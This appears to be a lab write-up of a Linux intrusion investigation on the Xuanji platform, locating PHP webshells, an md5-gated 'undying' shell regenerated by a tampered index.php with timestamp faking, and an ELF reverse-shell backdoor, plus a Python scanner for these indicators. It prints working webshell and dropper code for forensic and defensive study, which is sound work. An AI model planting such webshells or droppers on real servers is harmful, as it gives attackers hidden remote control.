Looking for light.

Xuanji (玄机): Linux Intrusion Investigation

First we start the target machine. Grepping for the malicious function eval, we can see that index.php contains a backdoor statement, and sh.php holds the first flag.

./index.php:17:$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
./1.php:1:<?php eval($_POST[1]);?>
./.shell.php:1:<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>


root@xuanji:/var/www/html# cat sh.php
1       2       <?php @eval($_POST['a']);?>     4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

Crack the hash on the cmd5 site or with hashcat and the password turns out to be hello. Looking at the contents of index.php, we find that it is what regenerates the self-regenerating "undying" webshell (不死马) .shell.php.

root@ip-10-0-10-1:/var/www/html# cat index.php
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
        $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
        Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
        Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
root@ip-10-0-10-1:/var/www/html# ls -al
total 736
drwxrwxrwx 8 www-data www-data   4096 Aug  3  2023  .
drwxr-xr-x 3 root     root       4096 Aug  3  2023  ..
-rwxrwxrwx 1 www-data www-data     24 Aug  3  2023  1.php
-rw-r--r-- 1 root     root     655360 Aug  3  2023  1.tar
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  admin
-rwxrwxrwx 1 www-data www-data    280 Aug  3  2023  api.php
-rwxrwxrwx 1 www-data www-data    882 Aug  3  2023  config.php
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  data
-rwxrwxrwx 1 www-data www-data    894 Aug  3  2023  favicon.ico
-rwxrwxrwx 1 www-data www-data    142 Aug  3  2023  .htaccess
drwxrwxrwx 4 www-data www-data   4096 Aug  3  2023  include
-rwxrwxrwx 1 root     root        722 Aug  3  2023  index.php
-rwxrwxrwx 1 www-data www-data  12744 Aug  3  2023  install.php
-rwxrwxrwx 1 www-data www-data   1080 Aug  3  2023  LICENSE
drwxrwxrwx 2 www-data www-data   4096 Aug  3  2023  pictures
-rwxrwxrwx 1 www-data www-data   2235 Aug  3  2023  README.md
-rwxrwxrwx 1 www-data www-data   1049 Aug  3  2023  rss.php
-rw-r--r-- 1 www-data www-data    207 Aug  3  2023 'shell(1).elf'
-rw-r--r-- 1 www-data www-data     88 Jan  1  2021  .shell.php
-rwxrwxrwx 1 www-data www-data    566 Aug  3  2023  sitemap.php
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  template
drwxrwxrwx 3 www-data www-data   4096 Aug  3  2023  wa
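A defender-side check for the pattern above, added here as an example and not part of the original write-up: it walks a web root, flags PHP files that eval() request input, flags the dropper combination of file_put_contents() plus a backdating touch, and catches the fake timestamp itself by comparing mtime with ctime (touch -m rewrites mtime, but the kernel still bumps ctime). The sample web root it builds is constructed to mirror the listing; the md5 hash is the one from this page.

```python
import os, re, tempfile, time

# Indicators from this write-up: one-line eval() webshells fed from $_POST, and the
# dropper in index.php that rewrites .shell.php and backdates it with `touch -m -d`.
WEBSHELL_RE = re.compile(r"@?eval\s*\(\s*\$_(POST|GET|REQUEST)\b", re.I)
TOUCH_RE = re.compile(r"touch\s+(-\w+\s+)*-[dt]\b")
GAP = 24 * 3600  # mtime more than a day older than ctime: timestomping indicator

def scan_file(path):
    """Return the indicator names that fire for one PHP file."""
    with open(path, errors="replace") as f:
        src = f.read()
    hits = []
    if WEBSHELL_RE.search(src):
        hits.append("eval-webshell")
    if "file_put_contents(" in src and TOUCH_RE.search(src):
        hits.append("dropper-with-timestomp")
    st = os.stat(path)  # touch -m changes mtime only; ctime still reflects the write
    if st.st_ctime - st.st_mtime > GAP:
        hits.append("mtime-backdated")
    return hits

def scan_webroot(root):
    """Walk a web root and map each suspicious .php file (relative path) to its hits."""
    found = {}
    for d, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                hits = scan_file(os.path.join(d, n))
                if hits:
                    found[os.path.relpath(os.path.join(d, n), root)] = hits
    return found

def build_sample_webroot():
    """Constructed sample mirroring the listing in the write-up (not the real target)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    shell = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>'
    files = {
        "index.php": "<?php include('config.php');\n$file = '/var/www/html/.shell.php';\n"
                     "$code = '%s';\nfile_put_contents($file, $code);\n"
                     "system('touch -m -d \"2021-01-01 00:00:01\" .shell.php');\n?>" % shell,
        ".shell.php": shell,
        "1.php": "<?php eval($_POST[1]);?>",
        "config.php": "<?php define('SYS_ROOT', __DIR__); ?>",  # clean control file
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w") as f:
            f.write(body)
    old = time.mktime((2021, 1, 1, 0, 0, 1, 0, 0, -1))  # emulate the backdating touch
    os.utime(os.path.join(root, ".shell.php"), (old, old))
    return root
```

Run `scan_webroot("/var/www/html")` on a real web root; the ctime/mtime gap is the check that survives even when the attacker has hidden the file and faked its listing date.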

There is also an ELF backdoor file in the current directory, so we pull it out for analysis. Uploading this ELF to the ThreatBook (微步) cloud sandbox gives the reverse-shell callback address 10.11.55.21 and port 3333.